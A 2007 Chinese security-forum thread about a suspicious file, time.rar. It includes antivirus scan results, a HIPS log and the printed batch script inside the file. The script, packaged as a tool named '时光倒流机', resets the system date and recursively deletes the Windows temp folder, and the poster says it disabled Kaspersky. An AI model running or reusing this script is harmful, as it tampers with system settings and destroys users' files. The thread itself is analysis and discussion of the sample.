可疑病毒

rest1min

文件 time.rar 接收于 2007.12.31 05:27:33 (CET)

反病毒引擎	版本	最后更新	扫描结果
AhnLab-V3	2007.12.29.11	2007.12.29	-
AntiVir	7.6.0.46	2007.12.30	TR/Dldr.Agent.YDV
Authentium	4.93.8	2007.12.30	W32/Dropper.EUQ
Avast	4.7.1098.0	2007.12.30	-
AVG	7.5.0.516	2007.12.30	Potentially harmful program HackTool.DHN
BitDefender	7.2	2007.12.31	Trojan.Downloader.Agent.YDV
CAT-QuickHeal	9.00	2007.12.29	-
ClamAV	0.91.2	2007.12.31	-
DrWeb	4.44.0.09170	2007.12.30	-
eSafe	7.0.15.0	2007.12.30	suspicious Trojan/Worm
eTrust-Vet	31.3.5412	2007.12.29	-
Ewido	4.0	2007.12.30	-
FileAdvisor	1	2007.12.31	-
Fortinet	3.14.0.0	2007.12.31	-
F-Prot	4.4.2.54	2007.12.31	W32/Backdoor.ATVB
F-Secure	6.70.13030.0	2007.12.31	-
Ikarus	T3.1.1.15	2007.12.31	Trojan-Dropper.Win32.Agent.bjw
Kaspersky	7.0.0.125	2007.12.31	-
McAfee	5195	2007.12.28	-
Microsoft	1.3109	2007.12.31	-
NOD32v2	2757	2007.12.30	-
Norman	5.80.02	2007.12.28	-
Panda	9.0.0.4	2007.12.30	Suspicious file
Prevx1	V2	2007.12.31	-
Rising	20.24.52.00	2007.12.29	-
Sophos	4.24.0	2007.12.31	Mal/Generic-A
Sunbelt	2.2.907.0	2007.12.30	-
Symantec	10	2007.12.31	-
TheHacker	6.2.9.175	2007.12.29	-
VBA32	3.12.2.5	2007.12.29	-
VirusBuster	4.3.26:9	2007.12.30	-
Webwasher-Gateway	6.6.2	2007.12.30	Trojan.Dldr.Agent.YDV

不多说，大家测试一下

[ 本帖最后由 rest1min 于 2008-1-1 20:51 编辑 ]

moonsilver

貌似是好东西

rest1min

确实是好东西，执行后马上让卡巴瘫痪了，修改时间时，卡巴主防一点也没拦截住。

醉一生爱妍

汗，原来还不是类似于病毒之类的

LZ说清楚点。。

hahacomcn

Begin scan in 'C:\Documents and Settings\haha\桌面\time.rar'
C:\Documents and Settings\haha\桌面\time.rar
  [0] Archive type: RAR
  --> time.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Agent.YDV
      [INFO]      A backup was created as '47e57528.qua'  ( QUARANTINE )

a256886572008

2007-12-31 12:54:43    建立檔案      操作:允許
程序路徑:D:\time.exe
檔案路徑:C:\Documents and Settings\Hung Jui Hung\Local Settings\Temp\时光机.bat
觸發規則:所有程序規則->全域設定_可執行檔案1->%SystemDrive%\*.bat


2007-12-31 12:54:45    執行應用程序      操作:允許
程序路徑:D:\time.exe
檔案路徑:C:\WINDOWS\system32\cmd.exe
指令列:/c ""C:\DOCUME~1\HUNGJU~1\LOCALS~1\Temp\时光机.bat""
觸發規則:所有程序規則->系統程式_黑名單->*\cmd.exe


2007-12-31 12:54:48    修改系統時間      操作:封鎖
程序路徑:C:\WINDOWS\system32\cmd.exe

觸發規則:所有程序規則->*

时光机.bat 的結構

@rem ----- ExeScript Options Begin -----
@rem ScriptType: console
@rem DestDirectory: temp
@rem Icon: E:\华夏黑客联盟周年庆祝工具\tool\攻\漏洞攻击\扫描类(Scan)\HDSI 3.0 Goldsun干净拓宽版\tb.ico
@rem OutputFile: C:\Documents and Settings\Administrator\桌面\时光机.exe
@rem CompanyName: 中国网安(黑梦基地)
@rem FileVersion: 1.0.0.0
@rem LegalCopyright: 中国网安(黑梦基地)
@rem ProductName: 时光倒流机
@rem ProductVersion: 1.0.0.0
@rem ----- ExeScript Options End -----
@echo off
color a
echo=================================================================================
echo                               时光倒流机 无提示版
echo                   本工具为教学研究之用，严禁用来进行恶意破坏。
echo                         出现任何法律责任请使用者自负！
echo                             黑梦基地技术交流社区
echo                          http://bbs.hacker110.net.cn
echo=================================================================================
echo 无提示自动修改时间，因为相当危险请慎用
echo                                                  Powered By  天星 QQ：7668765
set date=%date%
date 1989.10.21
date 1989.10.21
@echo off & setlocal enableextensions
set /a i = 20
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
goto Timeout
goto End
:Next
date 1949.10.21
RD /S /Q %systemroot%\temp\
exit

[ 本帖最后由 a256886572008 于 2007-12-31 12:59 编辑 ]

rest1min

原帖由 garyyan456 于 2007-12-31 12:48 发表
汗，原来还不是类似于病毒之类的

LZ说清楚点。。

应该算是病毒吧，杀软不都报是木马吗?

a256886572008

不是病毒

浪滔天

就像一把刀子，你用它来切菜没什么问题，你用它来杀人就成凶器了。

雪落的瞬间

严重 无聊  ...